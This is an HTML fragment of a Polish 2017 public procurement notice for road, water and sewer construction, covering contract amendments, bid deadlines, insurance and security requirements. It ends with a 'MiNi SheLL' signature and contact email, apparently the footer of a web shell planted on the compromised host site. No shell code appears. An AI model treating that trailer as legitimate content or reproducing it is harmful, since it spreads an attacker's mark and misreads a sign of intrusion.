              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający przewiduje możliwość dokonania zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1) Wystąpienia zmian powszechnie obowiązujących  przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób  zmian będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów,
3) Zmiana podwykonawcy pod warunkiem spełnienia warunków określonych w umowie, 
4) Zmiana albo rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust 1 ustawy PZP w celu wykazania spełnienia warunków udziału w postępowaniu. Wykonawca jest zobowiązany wykazać zamawiającemu, iż  proponowany podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby  wykonawca powoływał się w trakcie postepowania o udzielenie zamówienia, oraz wykazać, iż w stosunku do proponowanego  podwykonawca nie zachodzą przesłanki wykluczeniu z postępowania określone w art. 24 ust 1 oraz art. 24 ust 5 pkt 1 ustawy PZP  - w tym celu wykonawca przedkłada  wypełniony przez podwykonawcę oświadczenie (załącznik nr 2B) wraz z dokumentami potwierdzającymi brak podstaw do wkluczenia
5) skorzystania z podwykonawców w realizacji zamówienia mimo, iż w złożonej ofercie Wykonawca nie przewidywał realizacji części zamówienia w podwykonawstwie;
6)Rezygnacja z podwykonawstwa, zmiany zakresu  zamówienia realizowanego  w podwykonawstwie,
7)  Wystąpienie konieczności wprowadzenia zmian spowodowanych m.in. okolicznościami:
a)siłą wyższa  uniemożliwiająca  realizację przedmiotu umowy zgodnie z umową oraz mająca wpływ na terminowość  wykonania przedmiotu umowy oraz wysokość wynagrodzenia za przedmiot umowy 
b)przestojów opóźnień zawinionych przez zamawiającego  mających bezpośredni wpływ  na terminowość realizacji przedmiotu umowy
c)zmiana danych związanych z obsługa administracyjno-organizacyjną umowy
d)zmiana terminów płatności 
e)Wystąpienia omyłek rachunkowych, pisarskich w treści umowy
f)Rezygnacja  przez zamawiającego z realizacji części umowy
g)Zmiana użytych materiałów 
8)Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić  m.in. w przypadku:
a) zmiany ustawowej stawki podatku VAT. W przypadku  zmniejszenia stawki podatku VAT -  ceny jednostkowe netto pozostają bez zmian.  Wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem   zmniejszonej stawki podatku VAT.  W przypadku zwiększenia stawki podatku VAT - ceny jednostkowe netto pozostaną bez zmian a wartość wynagrodzenia brutto zostanie powiększona z odpowiednim zastosowaniem   zwiększonej stawki podatku VAT.
b) zmiany minimalnego wynagrodzenia za pracę  ustalonego  na podstawie art. 2 ust 3-5 ustawy z dnia 10.10.2002r o minimalnym wynagrodzeniu za pracę  i/lub zmian zasad podlegania ubezpieczeniom społecznym, lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne i zdrowotne w przypadku zmian w przepisach, które nie były znane wykonawcy na dzień składania ofert ( nie były opublikowane) . Wysokość wynagrodzenia może nastąpić o kwotę wynikającą ze zmiany tych stawek o ile wykonawca wykaże iż zmiany te mają wpływ na koszty wykonania zamówienia przez wykonawcę. Zmiany te będą obowiązywać  od dnia zawarcia przez strony stosowanego aneksu. Wykonawca  zobowiązany jest udokumentować wpływ przedmiotowych zmian na koszty wykonania przedmiotu umowy, w szczególności jest zobowiązany przedłożyć Zamawiającemu dokumenty wskazujące na wzrost wynagrodzeń (w wyniku przedmiotowych zmian) osób biorących udział w realizacji zamówienia oraz wykazać wpływ wzrostu  kosztów wynagrodzeń na wzrost kosztów realizacji umowy. 
9) zmiany terminu wykonania przedmiotu umowy w przypadku pojawienia się okoliczności, które w ocenie Zamawiającego wymagają  wstrzymania robót do czasu  zajęcia stanowiska przez uprawnione instytucje i podmioty np.  konieczność uzyskania dodatkowych   specjalistycznych   opinii i ekspertyz
10) zmian umowy w przypadku zmian technologicznych o ile są korzystne dla Zamawiającego pod warunkiem, że są spowodowane w szczególności: 
a)pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót; 
b)pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy, 
11) zmiany umowy  związanej z koniecznością zrealizowania jakiejkolwiek części robót, objętych przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wykonaniem nienależytym przedmiotu umowy, 
12) zmiany umowy  w przypadku  odbiegających w sposób istotny od przyjętych w dokumentacji projektowej warunków geologicznych, geotechnicznych lub hydrologicznych, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu umowy, 
13)zmiany umowy w przypadku odbiegających w sposób istotny od przyjętych w dokumentacji projektowej warunków terenu budowy, w szczególności napotkania nie zinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych, w przypadku konieczności dostosowania rzędnych terenu (w tym terenów przyległych) do  rzędnych projektowanych w celu umożliwienia dostępu  do drogi  publicznej, 
14)zmiany umowy w przypadku konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, 
15)zmiany umowy w przypadku wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, 
16)zmiany umowy w przypadku zaistnienia innych okoliczności prawnych lub technicznych, skutkujących niemożliwością wykonania lub należytego wykonania umowy zgodnie z jej postanowieniami, 
17)zmiany umowy w przypadku nadzwyczajnej zmiany okoliczności, o których mowa w art. 357[1] § 1 Kodeksu cywilnego, w zakresie niezbędnym do usunięcia rażącej straty Wykonawcy, 
18)zmiana postanowień umowy w przypadku  ograniczenie zakresu robót przy jednoczesnym zmniejszeniu wynagrodzenia Wykonawcy na podstawie przeprowadzonej inwentaryzacji. 
19)zmiany umowy w przypadku wystąpienia niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych uniemożliwiających prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonych umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okolicznościami, za które Wykonawca ponosi odpowiedzialność, 
20)zmiany umowy w przypadku odmowy wydania przez właściwe organy decyzji, zezwoleń, uzgodnień itp. z przyczyn niezawinionych przez Wykonawcę, 
21)zmiany umowy w przypadku niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ich wykonania z przyczyn niezawinionych przez Wykonawcę, 
22)w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy a mających charakter zmian nieistotnych w rozumieniu  z art. 144 ust 1e ustawy PZP
23)jeśli łączna wartość zmian jest mniejsza  niż kwoty określone w przepisach wydanych  na podstawie art. 11 ust 8 ustawy PZP i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie
2.  Ponadto Zamawiający przewiduje możliwość dokonania zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie określonym w art. 144 ust.1 pkt.2 pkt 3, pkt 4,  ust. 1a,   ust. 1b, ust. 1c, ust. 1d, ust.1e, oraz ust. 2 i ust. 3 ustawy Pzp.
3.  zmiany w sposobie fakturowania i terminów zapłat za faktury 
4. Zmiany w zakresie zmiany terminu wykonania przedmiotu umowy:
a)  w przypadku wstrzymania robót budowlanych ( termin umowny zostanie wydłużony o liczbę dni  wstrzymania robót). Wstrzymanie wykonania prac może nastąpić w przypadku:
-    niesprzyjających warunków atmosferycznych uniemożliwiających kontynuację prac lub niszczących zaawansowanie robót. Pod pojęciem niesprzyjające warunki atmosferyczne rozumie się warunki atmosferyczne, które swoim zakresem (intensywność opadów, temperatura) i terminem(długość trwania) odbiegają od warunków atmosferycznych charakterystycznych dla tej pory roku i tego  rejonu  w latach ubiegłych a  obowiązujące przepisy nie dopuszczają do realizacji lub nakazują wstrzymanie robót. 
- w przypadku pojawienia się okoliczności, które w ocenie Zamawiającego wymagają  wstrzymania robót do czasu  zajęcia stanowiska przez uprawnione instytucje i podmioty np.  konieczność uzyskania dodatkowych  uzgodnień,  specjalistycznych   opinii i ekspertyz.
b) Zlecenie wykonania robót zamiennych mających wpływ na termin wykonania zamówienie podstawowego
5. zmiany materiałów, technologii wykonania robót . Na zmianę materiałów użytych do realizacji przedmiotu umowy w stosunku do SIWZ i oferty Wykonawcy bezwzględnie wymagana jest pisemna zgoda Zamawiającego. Zmiana  nastąpi w oparciu o wykonany kosztorys zamienny sprawdzony i zweryfikowany  przez Zamawiającego. Wykonawca wykona kosztorys zamienny w oparciu o dane wyjściowe do kosztorysowania przyjęte w kosztorysie ofertowym, który Wykonawca dostarcza przed podpisaniem umowy 
6. zmiana wynagrodzenia umowy ze względu na odstąpienie od realizacji części  przedmiotu zamówienia- wynagrodzenie zostanie pomniejszone o koszt  robót zaniechanych.
7.  zmiany w  wynagrodzeniu  ze względu na wykonanie robót zamiennych
8.Warunki dokonywania zmian:
1) pisemny wniosek Wykonawcy lub Zamawiającego;
2) w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne, konsorcja): 1)W przypadku wspólnego ubiegania się o zamówienie wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust 1 oraz 24 ust 5 pkt 1 ustawy PZP 3)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, iż wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu składa każdy z wykonawców ubiegający się wspólnie o zamówienie; 4)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie o przynależności do grupy kapitałowej - Załącznik nr 4 składa każdy z wykonawców ( każdy z konsorcjantów, każdy wspólnik spółki cywilnej). 5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców są oni zobowiązani - każdy z Wykonawców złożyć dokumenty i oświadczenia o braku podstaw do wykluczenia. 

2.Wykonawca w celu zawarcia umowy jest zobowiązany przedłożyć n/w dokumenty:
 1) przedstawić umowę konsorcjum  jeśli dotyczy;
2) przedstawić umowę spółki cywilnej  jeśli dotyczy,
3) wykaz podwykonawców, umowy z podwykonawcami itd jeśli dotyczy
4) przedstawi dowód wniesienia zabezpieczenia należytego wykonania umowy,
5) kosztorys ofertowy stanowiący podstawę wyceny zamówienia w ofercie, 
6)harmonogram robót uwzględniający podział na poszczególne elementy zadania, ich wartość, kolejność realizacji poszczególnych robót w sposób umożliwiający zamawiającemu weryfikację terminowości realizacji zadania. 
5.W związku z zawarciem umowy o roboty budowlane wykonawca będzie zobowiązany do zawarcia umowy / umów ubezpieczenia od wszelkiego ryzyka i odpowiedzialności związanej z realizacją umowy o roboty budowlane oraz do terminowego opłacania należnych składek ubezpieczeniowych, w zakresie:
1) od ryzyk budowlanych (np. CAR, EAR lub CWAR) z sumą ubezpieczenia nie niższą niż cena ofertowa brutto,
2) od odpowiedzialności cywilnej (OC) wykonawcy z tytułu prowadzonej działalności gospodarczej, obejmujące w swym zakresie co najmniej szkody poniesione przez osoby trzecie w wyniku śmierci, uszkodzenia ciała, rozstroju zdrowia (szkoda osobowa) lub w wyniku utraty, zniszczenia lub uszkodzenia mienia własnego lub osób trzecich, a także szkody spowodowane błędami (szkoda rzeczowa), powstałe w związku z wykonywaniem robót budowlanych i innych prac objętych przedmiotem umowy o roboty budowlane, na kwotę ubezpieczenia nie niższą niż cena ofertowa brutto,
3) ubezpieczenie kadry, pracowników wykonawcy oraz każdego podwykonawcy (dalszego podwykonawcy), a także wszelkich innych osób realizujących w imieniu wykonawcy lub podwykonawcy roboty budowlane.
3.Ubezpieczenie winno być zawarte nie później niż w dniu przekazania terenu budowy. Kopię dokumentu ubezpieczenia (polisy) należy przedstawić zamawiającemu w terminie 7 dni od daty wystawienia dokumentu. Wykonawca winien przedłożyć polisę ubezpieczenia wraz z dowodem opłacenia składek. W przypadku płatności składek w ratach ubezpieczyciel powinien określić z jakim dniem rozpoczyna się materialny bieg odpowiedzialności ubezpieczyciela. W przypadku uchybienia przedmiotowemu obowiązkowi zamawiający ma prawo wstrzymać realizację robót z przyczyn leżących po stronie wykonawcy i naliczyć kary umowne. Wykonawca ponosi wszelką odpowiedzialność za szkody dotyczące pracowników i osób trzecich, powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych. Wykonawca ponosi wszelką odpowiedzialność za szkody wyrządzone przez podwykonawców / dalszych podwykonawców. 
4. Wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10 % zaoferowanej ceny brutto. Zabezpieczenie może być wniesione w: 1)pieniądzu, 2) poręczeniach bankowych lub poręczeniach SKOK, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, 3)gwarancjach ubezpieczeniowych, 4)gwarancjach bankowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
5.  Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
6. Wszelkie rozliczenia wynikające z realizacji niniejszej umowy pomiędzy stronami będą się odbywać w PLN.
7. Na podstawie art. 29 ust 3a ustawy PZP Zamawiający wymaga zatrudnienia przez wykonawcę / podwykonawcę osób bezpośrednio realizujących niniejsze zamówienie na podstawie umowy o pracę w myśl Kodeksu Pracyw szczególności:
a)wykonanie prac budowlanych związanych z wykonywaniem wykopów i przygotowanie terenu  pod budowę drogi wraz z infrastruktura;
b)układanie wodociągów, kanałów kanalizacji sanitarnej wraz z wykonaniem studni oraz wpustów ulicznych;
c)wykonanie podbudowy pod projektowany układ drogowy;
d)wykonanie nawierzchni z kostki betonowej wraz z niezbędnymi elementami w tym m.in. krawężniki, oporniki.
e)montaż docelowego oznakowania;
f)niwelacja terenu,
o ile wykonywanie w/w czynności polega na wykonywaniu pracy w sposób określony w art.  22 §1 ustawy z dnia 26 czerwca 1974r  Kodeksu pracy ( tekst jednolity Dz.U. z 2014r poz.1502 z pźn. zm.) dalej zwanym KP). Zgodnie z treścią art. 22 § 1 KP przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę a pracodawca  zobowiązuje się do zatrudnienia pracownika za wynagrodzeniem. Zamawiający nie będzie wymagał zatrudnienia na podstawie umowy o pracę w myśl Kodeksu Pracy osób pełniących samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. prawo budowlane (Dz. U. z 2016 r. poz. 290 ze zm.).
Powyższy obowiązek  dotyczy również podwykonawców. Wykonawca zobowiązany jest zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób wykonujących  w/w czynności. 

</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com